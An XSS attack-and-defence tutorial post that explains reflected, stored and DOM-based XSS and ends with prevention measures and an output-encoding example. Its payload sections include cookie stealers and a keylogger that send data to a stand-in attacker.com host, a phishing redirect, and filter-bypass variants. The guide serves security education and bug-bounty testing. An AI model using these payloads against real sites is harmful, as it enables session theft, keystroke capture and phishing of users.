
XSS (Cross-Site Scripting) — Complete Attack & Defense Guide

Anuj Singh (Admin), 30 April 2026

Cross-Site Scripting (XSS) Explained

XSS allows attackers to inject malicious JavaScript into web pages viewed by other users. It is consistently in the OWASP Top 10 and one of the most common bug bounty findings.

When successful, XSS lets an attacker: steal session cookies, redirect users to phishing pages, log keystrokes, take screenshots, and perform actions as the victim.

Types of XSS

1. Reflected XSS — Not Stored in Database

The payload arrives in the current HTTP request (typically a URL parameter) and the server echoes it back into the response without encoding it, so it only affects the user who opens the crafted link.

Vulnerable URL:
https://example.com/search?q=hello

Injected URL:
https://example.com/search?q=<script>alert('XSS')</script>

Vulnerable code (PHP):
echo "You searched for: " . $_GET['q'];  // No output encoding: the parameter is written into the HTML as-is

2. Stored XSS — Persists in Database

The script is stored in the application and served to every user who views the affected page. This is the most dangerous type.

Attack: Submit this in a comment box:
<script>
  fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

Every visitor to the page now sends their session cookie to the attacker.

3. DOM-Based XSS — Client-Side Only

Vulnerable JavaScript (the URL fragment, an attacker-controlled source, flows straight into innerHTML, an HTML sink):
document.getElementById('output').innerHTML = location.hash.slice(1);

Attack URL:
https://example.com/#<img src=x onerror=alert('XSS')>

The fragment is never sent to the server; the page's own JavaScript writes it into the DOM, so server-side filtering cannot catch it.

XSS Payloads — From Basic to Advanced

<!-- Basic alert (proof of concept) -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>

<!-- Cookie stealer -->
<script>document.location='https://attacker.com/?c='+document.cookie</script>

<!-- Keylogger -->
<script>
document.onkeypress = function(e) {
  fetch('https://attacker.com/keys?k=' + e.key);
}
</script>

<!-- Phishing redirect -->
<script>window.location='https://evil-site.com/fake-login'</script>

Filter Bypass Techniques

<!-- When <script> is filtered -->
<ScRiPt>alert('XSS')</ScRiPt>
<img src=x onerror=alert('XSS')>
<svg/onload=alert('XSS')>

<!-- When quotes are filtered -->
<img src=x onerror=alert(String.fromCharCode(88,83,83))>

<!-- HTML encoding bypass -->
&lt;script&gt;alert('XSS')&lt;/script&gt;

<!-- JavaScript URL -->
<a href="javascript:alert('XSS')">Click me</a>

Finding XSS in Bug Bounty

# Manual testing checklist:
1. Every input field: name, email, comment, search
2. URL parameters: ?q=, ?page=, ?id=, ?redirect=
3. HTTP headers: User-Agent, Referer, X-Forwarded-For
4. JSON API parameters
5. File upload names and contents (SVG files can contain scripts)

# Automated testing with tools:
# XSStrike - intelligent XSS scanner
python3 xsstrike.py -u "https://target.com/search?q=test"

# Dalfox - fast XSS scanner
dalfox url "https://target.com/search?q=test"

Prevention — How to Prevent XSS

// 1. Never assign user input to innerHTML; treat it as text
// BAD: the string is parsed as HTML, so tags and event handlers in it run
element.innerHTML = userInput;

// GOOD: the string becomes a text node and is never parsed as markup
element.textContent = userInput;

// 2. When you must render user-supplied HTML, sanitize it with DOMPurify first
import DOMPurify from 'dompurify';
element.innerHTML = DOMPurify.sanitize(userInput);

// 3. Content Security Policy header: without 'unsafe-inline', inline <script>
//    blocks and onerror/onload handlers like the payloads above are blocked
Content-Security-Policy: default-src 'self'; script-src 'self'

// 4. HttpOnly cookies: document.cookie can no longer read the session cookie,
//    so the cookie stealers above get nothing (injected script can still act as the victim)
Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Strict
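Server-side output encoding for the reflected search page from earlier, as an added example that is not from the original post, written in Node.js rather than PHP (in PHP the equivalent is htmlspecialchars). escapeHtml, safeHref and renderSearchResult are names chosen here, and the ?redirect= style parameter from the checklist stands in for any value that ends up in an href.

```javascript
// Added example (not from the original post): output encoding for the
// reflected "You searched for:" page, in Node.js instead of PHP.
// escapeHtml, safeHref and renderSearchResult are hypothetical helper names.

// Encode the five characters that can change meaning inside an HTML text
// node or a double-quoted attribute value. This is what the PHP echo lacks.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Encoding alone does not make a URL safe: "javascript:alert('XSS')" passes
// through escapeHtml unchanged and still runs when placed in an href.
// Only accept http(s) URLs; anything else becomes a harmless "#".
function safeHref(value) {
  try {
    const url = new URL(String(value), 'https://example.com/');
    if (url.protocol === 'http:' || url.protocol === 'https:') {
      return escapeHtml(url.href);
    }
  } catch (e) {
    // unparseable input: fall through to the safe default
  }
  return '#';
}

// Build the page: the query lands in a text node, the redirect target lands
// in an href, and each context gets its own encoder.
function renderSearchResult(query, backUrl) {
  return (
    '<p>You searched for: ' + escapeHtml(query) + '</p>' +
    '<a href="' + safeHref(backUrl) + '">Back</a>'
  );
}

// Constructed inputs: the reflected and javascript: payloads from this post.
const page = renderSearchResult(
  "<script>alert('XSS')</script>",
  "javascript:alert('XSS')"
);
console.log(page);
```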
